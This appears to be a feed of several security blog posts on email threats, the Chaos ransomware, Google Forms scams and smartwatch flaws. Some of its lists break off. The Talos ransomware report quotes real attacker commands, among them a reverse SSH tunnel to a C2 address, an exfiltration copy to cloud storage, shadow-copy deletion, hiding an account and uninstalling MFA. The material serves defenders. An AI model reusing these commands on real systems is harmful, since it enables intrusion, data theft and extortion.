Instead of sending a suspicious link, attackers embed a QR code into an email, document, or image. When scanned, it sends the user to a fake website, often mimicking Microsoft 365, voicemail systems, or banking portals, where credentials can be stolen or malware downloaded.

Because the code is scanned on a phone, the attack often bypasses email filters and endpoint protection entirely. Mobile devices typically sit outside the company’s full security stack, which makes them an easy target.

Real Case: Fake Voicemail Lures via QR Code

In this ANY.RUN sandbox session, the attack comes in the form of an email telling the user they have a voicemail waiting, asking them to scan a QR code to listen.

Thanks to the sandbox’s automated interactivity, analysts don’t need to manually extract or decode anything. The QR code is scanned automatically and the URL is uncovered, all in just a few seconds.

That means faster insights, less analyst effort, and a clearer view of where the attack leads, even when the delivery method tries to avoid traditional defenses. For businesses, it’s a smarter way to catch threats that bypass filters and target mobile users directly.







CVE-2017-11882 is a remote code execution (RCE) vulnerability in a legacy component of Microsoft Office: the Equation Editor (eqnedt32.exe). The flaw is a stack buffer overflow caused by improper handling of objects in memory. When exploited, it allows attackers to execute arbitrary code on the victim’s system.

All it takes is for the user to open a specially crafted Office document, typically in .RTF or .DOC format.
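Since Equation Editor should practically never launch other programs, a widely used hunting heuristic for CVE-2017-11882 is to flag any process whose parent is eqnedt32.exe. The sketch below applies that rule to process-creation events, assumed here to be already parsed into dictionaries with hypothetical `image` and `parent_image` keys (for example, mapped from the Image and ParentImage fields of Sysmon process-creation events, Event ID 1).

```python
from pathlib import PureWindowsPath
from typing import Dict, Iterable, List

SUSPICIOUS_PARENTS = {"eqnedt32.exe"}


def eqnedt_children(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return process-creation events whose parent is the Equation Editor."""
    hits = []
    for event in events:
        # Compare only the file name, case-insensitively, since install paths vary.
        parent = PureWindowsPath(event.get("parent_image", "")).name.lower()
        if parent in SUSPICIOUS_PARENTS:
            hits.append(event)
    return hits


events = [
    {
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
    },
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe"},
]
for hit in eqnedt_children(events):
    print("Equation Editor spawned:", hit["image"])
```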

Real Case: Triggering the Exploit via Malicious Email

In this sandbox session, the malicious payload is delivered via an email containing a .eml attachment. This attachment includes an Office document that exploits CVE-2017-11882 through the Equation Editor.

ANY.RUN identified the exploit within seconds of the document opening, flagging the vulnerable process and its suspicious behavior right away. By catching CVE-2017-11882 so early, teams can reduce mean time to detect (MTTD), avoid time-consuming manual investigation, and respond before the threat spreads.

As soon as the victim opens the file, the EQNEDT32.EXE process is triggered, kicking off a series of malicious actions:

The above-mentioned attacks are happening right now, in inboxes just like yours. Some rely on tricking users. Others don’t need user interaction at all. And in many cases, traditional defenses simply don’t catch them in time.

This is exactly where ANY.RUN’s sandbox comes in handy. With real-time sandbox analysis, your team can uncover how threats behave, understand their full impact, and stop them before they spread.

Here’s what you gain when ANY.RUN becomes part of your email security workflow:

Try ANY.RUN now and take back control of your email security.

ANY.RUN is relied on by more than 500,000 cybersecurity professionals and 15,000+ organizations across finance, healthcare, manufacturing, and other critical industries. Our platform helps security teams investigate threats faster and with more clarity.

Speed up incident response with our Interactive Sandbox: analyze suspicious files in real time, observe behavior as it unfolds, and make faster, more informed decisions.

Strengthen detection with Threat Intelligence Lookup and TI Feeds: give your team the context they need to stay ahead of today’s most advanced threats.

Want to see it in action? Start your 14-day trial of ANY.RUN today →

The post Top Email Security Risks for Businesses and How to Catch Them Before They Cause Damage appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

The new Chaos has impacted a wide variety of business verticals and appears to be opportunistic rather than focused on any specific vertical. According to the actor’s data leak site, victims have been predominantly in the U.S., with fewer in the UK, New Zealand and India.

Chaos is a relatively new RaaS group that emerged as early as February 2025. The group is actively promoting its cross-platform ransomware on the Russian-speaking dark web cybercriminal forum Ransom Anon Market Place (RAMP) and is seeking collaboration with affiliates. They emphasize that the new Chaos ransomware is compatible with Windows, ESXi, Linux and NAS systems and offers features such as individual file encryption keys, rapid encryption and network resource scanning, all with a strong emphasis on high-speed encryption and robust security measures.

Additionally, the group provides an automated panel for managing targets and communications, which requires a paid entry fee that is refundable upon the first case of payment. They have also clearly stated in their dark web forum post that they explicitly avoid collaborating with BRICS/CIS countries, hospitals and government entities.

Furthermore, the group is offering an onion URL for potential affiliates to register for an account with the Chaos group and has provided a support email address at “win88@thesecure[.]biz”.

Talos IR observed that the group has been launching big-game hunting and double extortion attacks. Like other operators in the double extortion space, Chaos also runs a data leak site to disclose the stolen data of victims who fail to meet their ransom demands.

Chaos encrypts the victim’s environment, uses “.chaos” as the file extension for the encrypted files, and drops the ransom note “readme.chaos[.]txt”. In the ransom note, the actor claims that they attempted to perform security testing in the victim’s environment and were successful in compromising it. They also threaten the victims with the disclosure of their stolen confidential data if they fail to pay the ransom amount. The actor does not leave an initial ransom demand or payment instructions in their ransom note but provides instructions to contact them using an onion URL specific to each victim.
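For first-pass triage, the two file-system artifacts named above (the .chaos extension and the readme.chaos.txt note, defanged in this report as readme.chaos[.]txt) can be collected with a short script. This is a minimal sketch that assumes only those two indicators; the function name is hypothetical, it does not detect the ransomware binary itself, and builds configured with a different extension or note name would not be caught.

```python
from pathlib import Path
from typing import Dict, List

ENCRYPTED_SUFFIX = ".chaos"       # extension appended to encrypted files, per the report
RANSOM_NOTE = "readme.chaos.txt"  # ransom note name, per the report


def chaos_triage(root: Path) -> Dict[str, List[Path]]:
    """Walk a directory tree and collect files matching the two reported artifacts."""
    found: Dict[str, List[Path]] = {"encrypted": [], "notes": []}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        if path.name.lower() == RANSOM_NOTE:
            found["notes"].append(path)
        elif path.suffix.lower() == ENCRYPTED_SUFFIX:
            found["encrypted"].append(path)
    return found
```

A non-empty "notes" list is a strong signal on its own, while a count of encrypted files per directory helps scope how far encryption spread.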

Talos IR observed that the actor demanded a ransom of $300K through the victim communication channel and offered two options. If the victim pays, the actor will provide a decryptor for the targeted environments along with a detailed report of the penetration test conducted on the victim’s environment. The actor also assures the victim that the stolen data will not be disclosed and will be permanently deleted, and that they will not attack the victim again.

If the victim fails to pay the ransom, the actor threatens to disclose their stolen data and conduct a distributed denial-of-service (DDoS) attack on all the victim’s internet-facing services, as well as spread the news of their data breach to competitors and clients.

The Chaos ransomware actor is a recent and concerning addition to the evolving threat landscape, having shown minimal historical activity before the current wave of intrusions. Importantly, this new Chaos ransomware gang is not connected to the variants produced by the Chaos ransomware builder tool or its developers. To hide their identity, these threat actors have exploited the confusion within the security community regarding the name “Chaos” and its various variants and associated builder tools. This deliberate obfuscation complicates the identification and mitigation of risks posed by this emerging threat.

During our investigation of Chaos ransomware attacks, the Talos IR team observed several noteworthy TTPs.

T1598.004 – Phishing for Information: Voice Phishing (Vishing)

The actor gained initial access to the victim through social engineering, using phishing and voice phishing techniques. The victim was first flooded with spam emails encouraging them to contact the threat actor by telephone. When the victim called, the threat actor, impersonating an IT security representative, advised the victim to launch Microsoft Quick Assist, a remote assistance tool built into Windows, and instructed them to connect to the actor’s session.

T1016 – System Network Configuration Discovery

T1482 – Domain Trust Discovery

T1033 – System Owner/User Discovery

T1018 – Remote System Discovery

T1135 – Network Share Discovery

Talos IR observed multiple commands executed by the actor in the victim environment to carry out post-compromise discovery and reconnaissance. The actor collected network configuration details, information about domain controllers and trust relationships, logged-in user data and running processes, and performed reverse DNS lookups.

ipconfig /all
nltest /dclist
nltest.exe /domain_trusts
nltest.exe /dclist:$domain
nslookup $Internal_IP_address
net view $Internal_IP /all
quser.exe
tasklist.exe

T1059.001 – PowerShell

T1059 – Command and Scripting Interpreter

T1047 – Windows Management Instrumentation

The actor executed scripts and commands to perform the following actions on the victim machine, preparing the environment to download and execute malicious files and connect to the actor’s command and control (C2) server.

powershell.exe -noexit -command Set-Location -literalPath 'C:\Users\$user\Desktop'

PowerShell.exe -Nologo -Noninteractive -NoProfile -ExecutionPolicy Bypass; Get-DeliveryOptimizationStatus | where-object {($_.Sourceurl -CLike 'hxxp[://]localhost[:]8005*') -AND (($_.FileSize -ge '52428800') -or ($_.BytesFromPeers -ne '0') -or (($_.BytesFromCacheServer -ne '0') -and ($_.BytesFromCacheServer -ne $null)))} | select-object -Property BytesFromHttp, FileId, BytesFromPeers,Status,BytesFromCacheServer,SourceURL | ConvertTo-Xml -as string -NoTypeInformation

T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

T1133 – External Remote Services

Talos IR observed that the actor installed RMM tools such as AnyDesk, ScreenConnect, OptiTune, Syncro RMM and Splashtop Streamer on compromised machines to establish a persistent connection to the victim network.

The actor also executed a command that modifies a Windows registry setting to hide a user account from the Windows login screen. With this setting in place, the account still exists and can be used to log in via Remote Desktop Protocol (RDP) or runas, but its username is not displayed on the Welcome or login screen.

cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist /v $user_account /t REG_DWORD /d 0 /f

To secure continued access to the victim machines, the actor also used the net[.]exe utility to reset the passwords of enumerated domain user accounts in the victim network.

net[.]exe user $user_name $password /dom

T1555 – Credentials from Password Stores

Talos IR observed that the threat actor executed an “ldapsearch” command remotely on the victim machine through the reverse SSH tunnel and dumped user details from Active Directory to a text file. The actor is likely attempting to steal the credentials of privileged accounts in the victim’s Active Directory using the Kerberoasting technique, thereby gaining elevated privileges in the victim’s environment.

T1036.005 – Masquerading: Match Legitimate Name or Location

T1027 – Obfuscated Files or Information

T1562.001 – Impair Defenses: Disable or Modify Tools

Talos IR observed that the actor deleted the PowerShell event logs on the victim machine to evade security controls. The actor also attempted to uninstall security and multifactor authentication (MFA) applications on the victim machine using Windows Management Instrumentation Command-line (WMIC).

cmd.EXE /c wmic product where name=$MFA_application for Windows Logon x64 call uninstall /nointeractive

T1021.001 – Remote Services: Remote Desktop Protocol (RDP)

T1021.004 – Remote Services: SSH

T1021.002 – SMB/Windows Admin Shares

Talos IR found that the actor used an RDP client and Impacket, which enables command execution over Server Message Block (SMB) and Windows Management Instrumentation (WMI), to move laterally in the victim’s network.

mstsc.exe /v:$remote machine hostname
wmic /node:$host process call create "C:\Users\encryptor[.]exe /lkey:"$32-bytekey" /encrypt_step:40 /work_mode:local_network"

T1005 – Data from Local System

T1567.002 – Exfiltration Over Web Service

T1036.004 – Masquerading: Masquerade Task or Service

T1059.003 – Command and Scripting Interpreter: Windows Command Shell

During our investigation, we found that the actor used GoodSync, a legitimate and widely used file synchronization and backup software, in the attack to extract the data from the victim’s machine.

The actor executed a command using a file synchronization or cloud upload tool, masquerading as the legitimate Windows executable “wininit[.]exe”, to copy data from a network file share to a threat actor-controlled remote cloud storage location.

The command filters files on the victim machine to include only those files modified within the last year and excludes several file types, possibly to avoid large or sensitive files that may trigger detection, including: Adobe Photoshop documents, 7-Zip compressed archives, Microsoft Outlook files, image and audio files, generic database files, log files, temporary files, Hyper-V virtual hard disk files, Microsoft installer packages, executable files, dynamic-link library files, and disc image files.

Wininit[.]exe copy --max-age 1y --exclude *{psd,7z, mox,pst,FIT, FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi} [\\]FS01[\]data cloud1:basket123/data -q --ignore-existing --auto-confirm --multi-thread-streams 25 --transfers 15 --b2-disable-checksum -P
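To make the filter logic concrete, here is a minimal Python sketch that approximates which files the observed command would copy. It reads the `--exclude` pattern literally (a file is skipped when its name ends with any listed string, matched case-sensitively, with the stray spaces dropped) and treats `1y` as 365 days; both are assumptions about how the tool interprets its flags, and `would_be_copied` is a hypothetical helper, not part of any tool.

```python
import time
from pathlib import PurePath
from typing import Optional

# Suffixes from the observed --exclude pattern (stray spaces removed).
EXCLUDED_SUFFIXES = ("psd", "7z", "mox", "pst", "FIT", "FIL", "MOV", "mdb", "iso", "exe",
                     "dll", "wav", "png", "db", "log", "HEIC", "dwg", "tmp", "vhdx", "msi")
MAX_AGE_SECONDS = 365 * 24 * 3600  # assumption: "1y" treated as 365 days


def would_be_copied(path: str, mtime: float, now: Optional[float] = None) -> bool:
    """Approximate the observed filter: modified within the last year and
    name not ending in any excluded suffix (literal, case-sensitive glob reading)."""
    now = time.time() if now is None else now
    name = PurePath(path).name
    return (now - mtime) <= MAX_AGE_SECONDS and not name.endswith(EXCLUDED_SUFFIXES)
```

A defender could run a check like this over a file share inventory to estimate what such a command would have exfiltrated.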

T1071 – Application Layer Protocol: SSH

T1219 – Remote Access Software

The actor used the Windows OpenSSH client to establish a reverse SSH tunnel from the victim machine to the actor’s C2 server at IP address “45[.]61[.]134[.]36” on port 443 rather than the default SSH port. The command also disables SSH host key checking (StrictHostKeyChecking=no) and discards the server’s host key instead of storing it in the “known_hosts” file (UserKnownHostsFile=/dev/null). The -R option sets up remote forwarding of port 12840 on the actor’s server; because no local destination is specified, OpenSSH treats this as a reverse dynamic (SOCKS) forward, letting the actor proxy connections through the victim machine into the victim network.

C:\WINDOWS\System32\OpenSSH\ssh[.]exe -R :12840 -N userconnectnopass@45[.]61[.]134[.]36 -p 443 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no

T1490 – Inhibit System Recovery

T1486 – Data Encrypted for Impact

During the investigation, Talos IR found evidence that the encryption command had been executed in the victim environment. The ransomware performs selective encryption, encrypting only specific portions of the targeted files to increase speed, and appends the “.chaos” extension to the encrypted files on the victim machine.

Chaos Windows encryption command:

C:\Users\$filename[.]exe /lkey:"32-byte key" /encrypt_step:40 /work_mode:local_network

The new Chaos ransomware encryptor can encrypt files on both local and network resources. It uses anti-analysis techniques designed to evade detection and multi-threaded operation for rapid encryption. The design aims for maximum impact on targeted organizations while maintaining operational stealth and preventing recovery.

Talos found several samples of the Windows version of the Chaos ransomware encryptor. They are 32-bit executables compiled in February, March and May 2025, indicating the Chaos group’s ongoing activity.

In this section we explain the functionalities of the new Chaos ransomware encryptor used to target Windows machines.

The Chaos ransomware implements multi-layered anti-analysis techniques that systematically identify and evade debugging tools, virtual machine environments, automated sandboxes and security analysis platforms through window enumeration, process monitoring and timing analysis.

All of these checks rely on hash-based comparisons against precomputed values, so the binary does not store plaintext tool names that static analysis could detect. If the ransomware detects any analysis environment, it terminates immediately to prevent analysis.
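The hash-comparison trick can be illustrated with a short Python sketch. The report does not say which hash function Chaos uses; 32-bit FNV-1a is an assumption chosen only because it is a common choice for this technique, and the tool names below are illustrative, not the sample’s actual list. `analysis_tool_present` is a hypothetical helper.

```python
def fnv1a_32(name: str) -> int:
    """32-bit FNV-1a hash of the lower-cased UTF-8 name (hash choice is an assumption)."""
    h = 0x811C9DC5  # FNV offset basis
    for byte in name.lower().encode("utf-8"):
        h ^= byte
        h = (h * 0x01000193) & 0xFFFFFFFF  # FNV prime, truncated to 32 bits
    return h


# A real sample would ship only hard-coded integers; they are computed from
# illustrative names here just to keep the sketch self-contained.
BLOCKLIST_HASHES = frozenset(
    fnv1a_32(n) for n in ("x64dbg.exe", "ollydbg.exe", "wireshark.exe", "procmon.exe")
)


def analysis_tool_present(process_names: list[str]) -> bool:
    """Return True if any running process name hashes to a blocklisted value."""
    return any(fnv1a_32(p) in BLOCKLIST_HASHES for p in process_names)
```

Analysts can invert this approach: hash a list of candidate tool names with the same function and match the results against integer constants recovered from the binary.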

Following a successful evasion, the ransomware parses command-line configuration parameters provided by the operator during the attack. A sample encryption command is shown below:

Encryptor[.]exe /lkey:"32-byte key" /encrypt_step:$0-100 /work_mode:$mode /ignorar_arquivos_grandes

At the same time, the ransomware executes an obfuscated system command that deletes shadow copies to prevent file recovery through Windows System Restore. In the binary, each character of the command is stored as a byte value followed by 0x0E, and the string is decrypted at runtime using a custom algorithm.

The decrypted volume shadow copy deletion command is shown below:

cmd.exe /c vssadmin to delete shadows /all

The ransomware employs hybrid cryptographic techniques utilizing Elliptic Curve Diffie-Hellman (ECDH) with Curve25519 for asymmetric operations and AES-256 for symmetric file encryption.

On each execution, the ransomware generates a unique ECC key pair using Windows CNG (Cryptography Next Generation), keeping the private key in memory and exporting the public key in ECCPUBLICBLOB format. File-specific encryption keys are derived from the ECDH key agreement combined with the operator-controlled 32-byte master key and another key generated for each encryption iteration, so each file receives a unique encryption key.
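The key-agreement step can be sketched in Python with only the standard library. This is illustrative: it implements X25519 from RFC 7748 in pure Python (not constant-time, so not for production use), and because the report does not describe how the shared secret, the 32-byte master key and the per-iteration key are combined, it uses HKDF-SHA256 (RFC 5869) as a stand-in. Which party’s public key serves as the ECDH peer is also not stated; an operator-held key pair is assumed, and `derive_file_key` is a hypothetical name. The AES-256 file-encryption step is omitted because the standard library has no AES.

```python
import hashlib
import hmac
import os

P = 2**255 - 19
A24 = 121665  # (486662 - 2) / 4, the Curve25519 ladder constant from RFC 7748
BASE_U = (9).to_bytes(32, "little")  # standard base point u = 9


def _clamp(k: bytes) -> int:
    """Decode a 32-byte scalar with the RFC 7748 bit clamping."""
    b = bytearray(k)
    b[0] &= 248
    b[31] &= 127
    b[31] |= 64
    return int.from_bytes(b, "little")


def x25519(k: bytes, u: bytes) -> bytes:
    """Montgomery-ladder scalar multiplication (RFC 7748, section 5). Not constant-time."""
    k_int = _clamp(k)
    x1 = int.from_bytes(u, "little") & ((1 << 255) - 1)  # mask the top bit
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in reversed(range(255)):
        bit = (k_int >> t) & 1
        swap ^= bit
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = bit
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) ** 2 % P
        z3 = x1 * (da - cb) ** 2 % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def hkdf_sha256(ikm: bytes, salt: bytes, info: bytes, length: int = 32) -> bytes:
    """HKDF extract-and-expand (RFC 5869) with SHA-256."""
    prk = hmac.new(salt, ikm, hashlib.sha256).digest()
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]


def derive_file_key(own_private: bytes, peer_public: bytes,
                    master_key: bytes, iteration_key: bytes) -> bytes:
    """Hypothetical per-file key: ECDH secret mixed with the master and per-iteration keys."""
    shared = x25519(own_private, peer_public)
    return hkdf_sha256(shared + iteration_key, salt=master_key, info=b"file-key")


if __name__ == "__main__":
    victim_priv, operator_priv = os.urandom(32), os.urandom(32)
    victim_pub = x25519(victim_priv, BASE_U)      # per-run public key, stored with each file
    operator_pub = x25519(operator_priv, BASE_U)  # assumed operator-held key pair
    master, iteration = os.urandom(32), os.urandom(32)
    k_victim = derive_file_key(victim_priv, operator_pub, master, iteration)
    k_operator = derive_file_key(operator_priv, victim_pub, master, iteration)
    print(k_victim == k_operator)  # both sides derive the same 32-byte key
```

In this sketch, whoever holds the other private key plus the master and per-iteration keys can re-derive a file key from the public key stored alongside it, which is the general property that makes per-file ECDH schemes recoverable only by the key holder.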

Chaos Ransomware handles three different modes of encryption: local, network and local_network (both).

In local encryption mode, the ransomware encrypts only the targeted set of files on the infected machine. It first attempts to open each file with normal access; if that fails, it elevates its privileges by modifying security descriptors and then impersonating tokens. To do this, it enumerates system processes such as svchost.exe and explorer.exe and opens their process tokens. By impersonating these high-privilege security contexts, the ransomware bypasses file access restrictions on victim machines.

The ransomware performs recursive directory traversal, skipping system-critical folders and files to avoid destabilizing the system while targeting user-created documents. On Windows machines, Chaos excludes a set of system folders and files from encryption.

In network encryption mode, the ransomware performs network discovery: it enumerates local network interfaces, identifies private IP address ranges, generates target lists of all hosts in the discovered subnets, connects to those hosts over SMB, and enumerates and queues their available network shares for encryption, excluding the administrative shares (ADMIN$, C$ and IPC$). This technique may allow the ransomware to propagate across entire corporate infrastructures, encrypting shared drives, network-attached storage and distributed file systems and significantly amplifying the attack’s impact.
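The discovery step relies on simple subnet arithmetic. Below is a minimal Python sketch using the standard `ipaddress` module; interface addresses are passed in as strings rather than read from Windows APIs, SMB share enumeration itself is not shown, and `candidate_hosts` and `shares_to_queue` are hypothetical helpers.

```python
import ipaddress

ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}  # administrative shares the report says are skipped


def candidate_hosts(interface: str) -> list[str]:
    """List every other host address in the interface's subnet, but only for private ranges."""
    iface = ipaddress.ip_interface(interface)
    if not iface.network.is_private:
        return []
    return [str(host) for host in iface.network.hosts() if host != iface.ip]


def shares_to_queue(shares: list[str]) -> list[str]:
    """Drop administrative shares; everything else would be queued for encryption."""
    return [s for s in shares if s.upper() not in ADMIN_SHARES]
```

For a machine at 192.168.1.10/24, `candidate_hosts` would return the 253 other usable addresses in that /24, which shows how quickly a single foothold expands into a subnet-wide target list.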

Chaos ransomware performs selective encryption based on the “/encrypt_step” command-line parameter specified by the operator during the attack. It calculates specific file offsets to encrypt, which speeds up encryption while still corrupting the entire file. It appends 60 bytes of metadata to every encrypted file, containing the public key in ECCPUBLICBLOB format and other encryption parameters such as the algorithm identifier and key data size, and then adds the “.chaos” extension to the file name.
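The report does not document how Chaos maps “/encrypt_step” to file offsets. As a hypothetical illustration only, the Python sketch below treats the value as a percentage and encrypts the first `percent`% of every fixed-size window, so a value of 40 touches roughly 40% of the file while still spreading damage across all of it. The 1 MiB window size and the `encryption_ranges` helper are assumptions.

```python
def encryption_ranges(file_size: int, percent: int,
                      window: int = 1 << 20) -> list[tuple[int, int]]:
    """Return (offset, length) pairs covering roughly `percent` of the file.

    Hypothetical layout: the first `percent`% of every `window`-byte window
    is encrypted; the rest of each window is left untouched."""
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    if percent == 0 or file_size == 0:
        return []
    chunk = max(1, window * percent // 100)
    ranges = []
    for offset in range(0, file_size, window):
        ranges.append((offset, min(chunk, file_size - offset)))
    return ranges
```

Skipping 60% of each window cuts the cryptographic work proportionally, yet no region of a large file is left fully intact, which matches the speed-versus-damage trade-off the report describes.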

The ransomware decrypts its ransom note using a custom XOR cipher with a 25-byte key. It allocates 1,310 bytes (0x51E) in memory for the decrypted note and uses complex offset calculations to obfuscate what is a simple XOR operation. The encrypted data is decrypted in 5-byte chunks, each using a distinct XOR key pattern derived from the 25-byte key. The decrypted ransom message is written to the file “readme[.]chaos[.]txt”.

The 25-byte key used for ransom note XOR decryption is:

e2 80 9a d0 a3 28 65 d1 97 d0 b9 d0 94 09 3e d1 85 d1 86 1d 01 e2 80 b9 e2
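For analysts who want to experiment with the note decryption, here is a simplified Python sketch using the key above. It applies the 25-byte key as a plain repeating XOR key, walked in 5-byte chunks; the sample’s obfuscated offset arithmetic is not reproduced, so treat this as an approximation that may not decrypt the real embedded note without adjustment. `xor_decode` is a hypothetical helper.

```python
# Key copied from the report (25 bytes).
KEY = bytes.fromhex(
    "e2 80 9a d0 a3 28 65 d1 97 d0 b9 d0 94 09 3e d1 85 d1 86 1d 01 e2 80 b9 e2"
)


def xor_decode(data: bytes, key: bytes = KEY, chunk: int = 5) -> bytes:
    """Simplified repeating-key XOR, processed in 5-byte chunks.

    Each byte is XORed with the key byte at the same position modulo the
    key length; the sample's real key indexing is obfuscated and may differ."""
    out = bytearray()
    for start in range(0, len(data), chunk):
        block = data[start:start + chunk]
        out += bytes(b ^ key[(start + i) % len(key)] for i, b in enumerate(block))
    return bytes(out)
```

Because XOR is its own inverse, the same function encodes and decodes, which makes it easy to test a hypothesis about the key schedule against a known plaintext fragment of the note.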

After completing encryption, the ransomware runs cleanup procedures: it terminates worker threads, frees memory buffers, releases cryptographic resources, cleans up network connections, closes file handles and finally terminates its process, ensuring a clean exit.

Talos assesses with moderate confidence that the new Chaos ransomware group is either a rebranding of the BlackSuit (Royal) ransomware or operated by some of its former members. This assessment is based on the similarities in TTPs, including encryption commands, the theme and structure of the ransom note, and the use of LOLbins and RMM tools in their attacks.

Talos IR observed that the Chaos operator utilizes configuration parameters for the encryption process during the attack, including “lkey”, “encrypt_step”, and “work_mode”. This configuration enables the ransomware to selectively encrypt both local and network resources within the victim’s environment.

Enc.exe /lkey:"<32-byte key>" /encrypt_step:40 /work_mode:local_network

Similar use of encryption parameters was seen in earlier Royal and BlackSuit ransomware attacks, according to external security reporting. Although the parameter names differ, they perform the same actions.

The table shows the similarities between the encryption parameters of the new Chaos and BlackSuit (Royal) ransomware.

| Chaos | BlackSuit (Royal) | Purpose |
|---|---|---|
| /lkey | -id | 32-byte key |
| /encrypt_step | -ep | Defines the portion (percentage) of each targeted file to be encrypted |
| /kill_vms | -stopvm | Stops virtual machines running on the target system |

The Chaos ransomware ransom note shares a similar theme and structure to Royal/BlackSuit, including a greeting, references to a security test, double extortion messaging, assurances of data confidentiality and an onion URL for contact.

Additionally, Talos observed similarities between the techniques used in the Chaos ransomware attacks and the BlackSuit ransomware TTPs reported in CISA’s StopRansomware advisory for BlackSuit (Royal) ransomware.

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort SIDs for the threats are:

ClamAV detections are also available for this threat:

IOCs for this threat can be found in our GitHub repository.

Cisco Talos Blog – Read More

You’ve probably filled out a Google Forms survey at least once — likely signing up for an event, taking a poll, or gathering someone else’s contacts. No wonder you did — this is a convenient and easy-to-use service backed by a tech giant. This simplicity and trust have become the perfect cover for a new wave of online scams. Fraudsters have figured out how to use Google Forms to hide their schemes, luring victims with promises of free cryptocurrency. And all the victim has to do to fall into the trap is click a link.

Just like parents tell their kids not to take candy from strangers, we recommend being cautious about offers that seem too good to be true. Today’s story is exactly about that. Our researchers have uncovered a new wave of scam attacks exploiting Google Forms. Scammers use this Google service to send potential victims emails offering free cryptocurrency.

As is often the case, the scam is wrapped in a flashy, tempting package: victims are lured with promises of cashing out a large sum of cryptocurrency. But before you can get your payout, the scammers ask you to pay a fee — though not right away. First, you have to click a link in the email, land on a fake website, and enter your crypto wallet details and your email address (a nice bonus for the scammers). And just like that, you wave goodbye to your money.

If we take a closer look at these emails, we’ll see that they don’t exactly win any awards for looking legit. That’s because, while Google Forms is a free tool that allows anyone, including scammers, to create professional-looking emails, these emails have a very specific look that’s pretty hard to pass off as a real crypto platform notification. So why do scammers use Google Forms?

Because this allows the message to slip through email filters, and there’s a good reason for that. Email messages like these are sent from Google’s own mail servers and include links to the domain forms.gle. The links look legit to spam filters, so there’s a good chance these messages will make it into your inbox. This is how scammers exploit the good reputation of this online service.

Google Forms scams are on the rise. According to some experts, the number of these scams increased by 63% in 2024 and likely continues to grow in 2025. That means one thing: you need to share this post right now with your loved ones who are just starting to explore the internet. Tell them about the most common types of scams today and how to protect themselves.

The easiest and most effective approach is to rely on a trusted security tool that alerts you whenever you try to visit a phishing website. What are some other things you can do?

If you’ve grown tired of all the Google Forms scams, you can set up a filter for the phrase “Create your own Google Form” in your email client. Every single Google Forms email contains that phrase, so the filter will move any messages with the text right to the spam folder. The problem with this approach is that you might miss legitimate emails from Google Forms. Here’s how to block these emails in Gmail and Outlook.
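Mail clients implement this rule through their own filter settings. To illustrate the same rule outside a mail client, for example in a custom mail-processing script, here is a minimal Python sketch that checks a raw message’s text parts for the phrase. `is_google_forms_mail` is a hypothetical name; like the client-side filter, it will also catch legitimate Google Forms messages, and an HTML part could in principle split the phrase across tags.

```python
from email import message_from_string, policy

PHRASE = "Create your own Google Form"


def is_google_forms_mail(raw_message: str) -> bool:
    """Return True if any text part of the message contains the Google Forms footer phrase."""
    msg = message_from_string(raw_message, policy=policy.default)
    for part in msg.walk():
        if part.get_content_maintype() == "text" and PHRASE in part.get_content():
            return True
    return False
```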


Kaspersky official blog – Read More

Sports smartwatches continue to be a prime target for cybercriminals, offering a wealth of sensitive information about potential victims. We’ve previously discussed how fitness tracking apps collect and share user data: most of them publicly display your workout logs, including precise geolocation, by default.

It turns out that smartwatches continue that lax approach to protecting their owners’ personal data. In late June 2025, all COROS smartwatches were found to have serious vulnerabilities that exposed not only the watches themselves but also user accounts. By exploiting them, malicious actors can gain full access to the data in the victim’s account, intercept sensitive information like notifications, change or factory-reset device settings, and even interrupt workout tracking leading to the loss of all data.

What’s particularly frustrating is that COROS was notified of these issues back in March 2025, yet fixes aren’t expected until the end of the year.

